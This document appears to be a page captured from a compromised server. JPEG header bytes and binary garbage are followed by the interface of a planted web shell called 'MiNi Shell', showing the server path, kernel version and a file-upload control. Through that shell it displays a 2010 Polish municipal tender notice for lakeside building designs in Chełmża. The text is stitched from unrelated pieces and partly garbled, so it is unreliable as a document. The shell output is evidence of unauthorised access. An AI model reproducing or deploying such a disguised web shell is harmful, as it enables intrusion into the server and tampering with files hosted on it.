JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100427/99351-N-2010.html

<p class="kh_header"><b>Chełmża: Wykonanie projektów budowlanych dla zadania inwestycyjnego pn. Budowa, przebudowa i rozbudowa infrastruktury terenów przy Jeziorze Chełmżyńskim będących w granicach administracyjnych miasta  służącej wypoczynkowi, turystyce i rekreacji.
.</b><br>
<b>Numer ogłoszenia: 99351 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Chełmża , ul. Gen. Hallera 2, 87-140 Chełmża, woj. kujawsko-pomorskie, tel. 056 675-22-91, faks 056 675-21-22.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów budowlanych dla zadania inwestycyjnego pn. Budowa, przebudowa i rozbudowa infrastruktury terenów przy Jeziorze Chełmżyńskim będących w granicach administracyjnych miasta  służącej wypoczynkowi, turystyce i rekreacji.
..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia

- Projekty   budowlane  wraz  z   uzyskaniem   decyzji    administracyjnych   niezbędnych   do wystąpienia z wnioskiem o pozwolenie na budowę należy  dostarczyć  w   4  egzemplarzach w  wersji  papierowej oraz w wersji   elektronicznej zapisanej w formacie PDF. 
-  Kosztorysy inwestorskie należy wykonać w 1 egzemplarzu w wersji papierowej.
- Przedmiar robót 1 egzemplarz wykonany w wersji papierowej oraz 1 egz. w wersji elektronicznej zapisanej w formacie PDF.
Należy wykonać niżej wymienione projekty:
1. Projekt budowlany doposażenia SKATE PARKU wybudowanego w ramach 
rewitalizacji -SP na planie Koncepcji Programowo  Przestrzennej- SKATEPARK    zlokalizowany    jest   po   południowej  stronie   Bulwaru   1000   Lecia  w   
pobliżu  ul. Toruńskiej. Powierzchnia  906,91m2, nawierzchnia   syntetyczna  z   poliuretanu. 
Należy zaprojektować następujące urządzenia:
Element 1 - Quarter pipe  1 szt. wymiary 320 x 488x150, 
Element 2 - Bank ramp + mini quarter 1 szt.  wymiary  416 x 610 x 150,
Element 3 - Funbox z grindboxem 2/3 1 szt. 720 x 366 x 60,
Element 4 - Poręcz prosta - z profila zamkniętego   o przekroju prostokątnym.

2. Projekt budowlany odwodnienia , urządzenia zieleni i małej architektury strefy 
wypoczynku aktywnego i placu kwietnego. -2 i 3 na Planie Koncepcji Programowo 
Przestrzennej-.
- 2 na planie Koncepcji Programowo Przestrzennej- Strefa wypoczynku aktywnego
Teren  zlokalizowany   po   południowej   stronie   Bulwaru   1000  Lecia,  powierzchnia  ok. 3 300,00 m2   bardzo    podmokły   i   grząski   szczególnie    po  opadach   deszczu.    Długo utrzymujące się kałuże uniemożliwiają korzystanie z niego przez mieszkańców. Sąsiaduje z bardzo zaniedbanym i nieatrakcyjnym wizualnie terenem przemysłowym. 
Dla    uaktywnienia   tego   obszaru   należy   zaprojektować   system   drenażu,   urządzenie  estetycznej  przestrzeni  zielonej  - zasadzenie krzewów i drzew, zainstalowanie elementów małej   architektury   w   tym   ławek  i   koszy  na  śmieci.  Należy  zaprojektować  wycinkę  zaniedbanego  pasa  zieleni  przy  płocie oraz pojedynczych drzew takich jak robinia, topola klon. Teren   graniczy  z  parcelami  o  charakterze  przemysłowym,  który  należy   zasłonić roślinnością    średniopienną    szpalerową,  o  wysokości   ok. 4  - 5 m np.  śliwą  wiśniową 
Pissardi,  na  całej  długości  istniejącego  płotu  zaprojektować  zasadzienie  pnącza  typ: bluszcz pospolity lub winobluszcz  pięciolistkowy.    Należy pamiętać o umożliwieniu dojazdu   do   urządzeń   gazowniczych   znajdujących   się   na   terenie   przyległym  do  strony południowej.
-3 na planie koncepcji Programowo Przestrzennej- Plac kwiatowy
Teren zlokalizowany  po południowej stronie Bulwaru 1000  Lecia   przylegający   bokiem do brzegu  jeziora,  powierzchnia  ok. 2 200,00 m2,  częściowo ogrodzony,  służący składowaniu łódek  miejscowego  koła  wędkarskiego.  Teren  podmokły  i  grząski szczególnie po opadach deszczu. Długo  utrzymujące  się  kałuże  uniemożliwiają korzystanie z niego przez mieszkańców. Rosną tu głównie topole i wierzby. 
Zaprojektować:
- otwarcie  obszaru na jezioro przez usunięcie płotów dzielących teren,
-  trawniki z rabatami kwiatowymi. 
-  brzeg trawiasty do samej linii wodnej. brzeg umocnić poprzez palikowanie  drewnianymi balami o średnicy 25-30 cm, okorowanymi, olejowanymi.

3. Projekt budowlany deptaka południowego -13 na planie Koncepcji Programowo 
Przestrzennej.
Należy  zaprojektować  pomost  na  palach   drewnianych  z   pokładem   z  płyt   z   tworzywa sztucznego szerokości 2,50 mb wzdłuż brzegu jeziora  prowadzący od Bulwaru 1000 Lecia do ul. Plażowej.

4. Projekt budowlany modernizacji i nadbudowy obiektu Klubu Sportowo - Turystycznego  Włókniarz  - 5  na  planie  Koncepcji Programowo Przestrzennej-, brak inwentaryzacji architektoniczno - konstrukcyjnej.
Budynek składający się z trzech segmentów segmenty zewnętrzne parterowe, segment środkowy piętrowy, nie podpiwniczony kryty dachem płaskim. Wyraźnie wyróżnia się jego środkowa część, dwukondygnacyjna, z tarasem od strony jeziora. Po obu stronach skrzydła, na  wysokość  1-ej kondygnacji- część zachodniego skrzydła oznaczona jako C na rys. 1 została  dobudowana  w  latach  osiemdziesiątych.  Jedyną  rzeczą, która łączy  ową  pobudowaną  halę  z resztą  obiektu  jest  tylko  wspólna  ściana.  W  części środkowej mieszczą się pomieszczenia administracyjne, socjalne, biurowe, umywalnie, sanitariaty  oraz  na  piętrze  świetlica. W  skrzydłach  znajdują  się hangary na łodzie i sprzęt sportowy   oraz   warsztat   szkutniczy.    Budynek   położony   wzdłuż  deptaka północnego,  o  architekturze  o  niskich  walorach wizualnych, teren wokół zamknięty, wydzielony,   niedostępny   dla   pieszych,   od  strony   deptaka   droga  dojazdowa  do budynku. Należy  zaprojektować   przebudowę   istniejącego   budynku,   która uwzględni   nadbudowę  skrzydła  b1 i  b2  z  przeznaczeniem  na  pokoje   mieszkalne,   a   także wybudowanie  nad  klatką  schodową   w   części   środkowej   wieży   widokowej. Projektowana architektura  charakterystyczna  dla niewielkich pensjonatów, stanic wodnych  poprawi  walory  całego  założenia  z  tego  powodu  również  część skrzydła zachodniego C otrzymała dach dwuspadowy. Program funkcjonalny: Część środkowa pozostaje w zasadzie niezmieniona, z adaptacją  istniejących     pomieszczeń po poszerzonej funkcji obiektu. W skrzydłach b1 i b2 na   parterze   znajdują się hangary - w części  C - warsztat szkutniczy. Z części skrzydła b2 od strony wschodniej  wydzielić  pomieszczenia, jako zaplecze kawiarni, funkcjonującej w sezonie letnim. Na piętrze skrzydeł b1 i b2 zaprojektować pokoje mieszkalne. Pomieszczenie obok świetlicy zaaranżować jako kuchnię

5. Projekt budowlany parkingu na terenie sąsiadującym z KST Włókniarz - 6 i P   na planie Koncepcji Programowo Przestrzennej-.
Powierzchnia  ok. 1 000,00 m2. Zaprojektować parking ogólnodostępny z dojazdem od ul. Sądowej. Nawierzchnia z kostki polbruk, wysoki parkan betonowy zlikwidować, zaprojektować urządzenie zieleni.

6. Projekt budowlany slipu  -6 i I  na planie Koncepcji Programowo Przestrzennej-. Zaprojektować na brzegu jeziora naprzeciwko placu sceny letniej, długość ok. 55,00 m. Zaprojektować 3 wolnostojące maszty z rury stalowej zwieńczone kulami, malowane farbą antykorozyjną, w kolorze antracytowym  z możliwością zawieszania flag i  banerów okolicznościowych. Teren przyległy do jeziora zaprojektować: pomost drewniany  z desek bejcowanych w kolorze ciemno brązowym  z zabezpieczającymi palikami do cumowania.

7. Projekt budowlany urządzeń zabawowych -9 - P   na planie Koncepcji Programowo Przestrzennej-.
Na plaży miejskiej od strony deptaka północnego zaprojektować urządzenia zabawowe w ilości  10 szt. z uwzględnieniem zjeżdżalni wodnej.

8. Projekt budowlany  mini placu  imprez plenerowych zlokalizowanego przy ul.   Łaziennej -9 - S i 9-W na planie Koncepcji Programowo Przestrzennej-.
Zaprojektować utwardzony plac z infrastrukturą do obsługi mini imprez plenerowych wejście na plac od strony ul. Łaziennej. Powierzchnia terenu 1150 m2, teren o ukształtowaniu tarasowym, różnica poziomów około 1,20 mb

9. Projekt budowlany przebudowy toalety publicznej zlokalizowanej przy ul. Łaziennej -9-T   na planie Koncepcji Programowo Przestrzennej-, - brak inwentaryzacji architektoniczno konstrukcyjnej.
Budynek parterowy, nie podpiwniczony, kryty dachem płaskim   o architekturze o niskich walorach. Należy zaprojektować przebudowę istniejącego budynku, która uwzględni zmianę konstrukcji i pokrycia dachowego , zmianę funkcji niektórych pomieszczeń oraz podniesienie walorów estetycznych elewacji, uwzględni wymianę stolarki okiennej i drzwiowej. Zaprojektować zieleń harmonizującą z otoczeniem.

10. Projekt budowlany modernizacji i rozbudowy budynku hotelu położonego przy ul. Tumskiej pierwszy taras skarpy, - brak inwentaryzacji architektoniczno - konstrukcyjnej.
Budynek parterowy, nie podpiwniczony, kryty dachem płaskim   o architekturze o niskich walorach. Należy zaprojektować przebudowę istniejącego budynku, która uwzględni zmianę konstrukcji i pokrycia dachowego - dach dwuspadowy oraz zagospodarowanie poddasza użytkowego, zmianę funkcji niektórych pomieszczeń, zagospodarowanie poddasza użytkowego umożliwiające zwiększenie bazy noclegowej. , podniesienie walorów estetycznych elewacji. Do istniejącego modernizowanego budynku należy zaprojektować prostopadłe skrzydło. Budynek architektoniczne identyczny z modernizowanym. Budynek parterowy, niepodpiwniczony, z poddaszem użytkowym , kryty dachem dwuspadowym, z pokojami gościnnymi na poddaszu użytkowym oraz funkcją usługowo - turystyczna na parterze - kuchnia, mini restauracja na około 70 miejsc, punkt  informacji turystycznej. Zaprojektować zieleń harmonizującą z otoczeniem.

 11. Projekt budowlany hangaru dla sprzętu  wodnego
Na  drugim tarasie skarpy przy ul. Tumskiej u podnóża  istniejącego budynku hotelowego nad brzegiem jeziora należy zaprojektować budynek  z pomieszczeniami dla obsługi wypożyczającej  sprzęt  pływający, ratowników, przebieralni dla osób korzystających z plaży wraz z zapleczem socjalnym.  Obiekt  powinien być wbudowany w skarpę . Stropodach powinien pełnić funkcję tarasu dla baru hotelu. Budynek parterowy nie podpiwniczony. Stropodach pełniący funkcję tarasu. Obok projektowanego obiektu obsługi wypożyczalni za schodami terenowymi należy zaprojektować hangar dla sprzętu pływającego  rowery wodne 10 szt.,  łodzie  wiosłowe  10 szt.,  kajaki 10 szt. Budynek parterowy niepodpiwniczony , stropodach pokryty darnią z trawy. Budynek powinien być wbudowany w skarpę.   

12. Projekt budowlany zieleni dla zrewitalizowanego obszaru Bulwaru 1000 Lecia
Należy  zaprojektować  zieleń  dla  wykonanej  rewitalizacji  obszaru  Bulwaru  1000 Lecia. Powierzchnia obszaru około 0.9500 ha..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  spełniają warunki określone w art. 22 ust. 1 ustawy Pzp, tzn:
a.  posiadają uprawnienia do wykonywania prac objętych przedmiotem zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania ,
b. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c. znajdują   się   w   sytuacji   ekonomicznej   i   finansowej   zapewniającej    wykonanie zamówienia, 
d. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy Pzp.
2. Udokumentują zrealizowanie w okresie ostatnich 3 lat co najmniej jednego zamówienia o  podobnym charakterze.
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga  się, aby przynajmniej jeden z Wykonawców (lub wspólnie) spełniał wymagania, o których  mowa w ust. 1 pkt a - c.   
4. Ocena spełniania powyższych warunków dokonana zostanie zgodnie z formułą spełnia nie  spełnia w oparciu o informacje zawarte w dokumentach oświadczeniach wymienionych w  rozdziale 6 niniejszej  specyfikacji.  Z  treści  załączonych dokumentów musi  jednoznacznie wynikać, że powyższe warunki Wykonawca spełnił. W przypadku  konsorcjum żaden z  Wykonawców  wspólnie  ubiegających  się  o udzielenie zamówienia nie  może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Pzp. 
5. Niespełnienie  chociażby  jednego  z  powyższych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta Chełmży ul. Gen. J. Hallera 2, 87-140 Chełmża pok. 18a Szyczewski Eugeniusz tel. 56 675 22 91 wew. 38, fax 56 675 21 22, E-mail: gkmum@post.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2010 godzina 11:00, miejsce: Urząd Miasta Chełmży ul. Gen. J. Hallera 2,87-140 Chełmża pok. 2.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja ta będzie przedmiotem wniosku o dofinasowanie ze środków Europejskiego Fundusz Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Kujawsko-Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com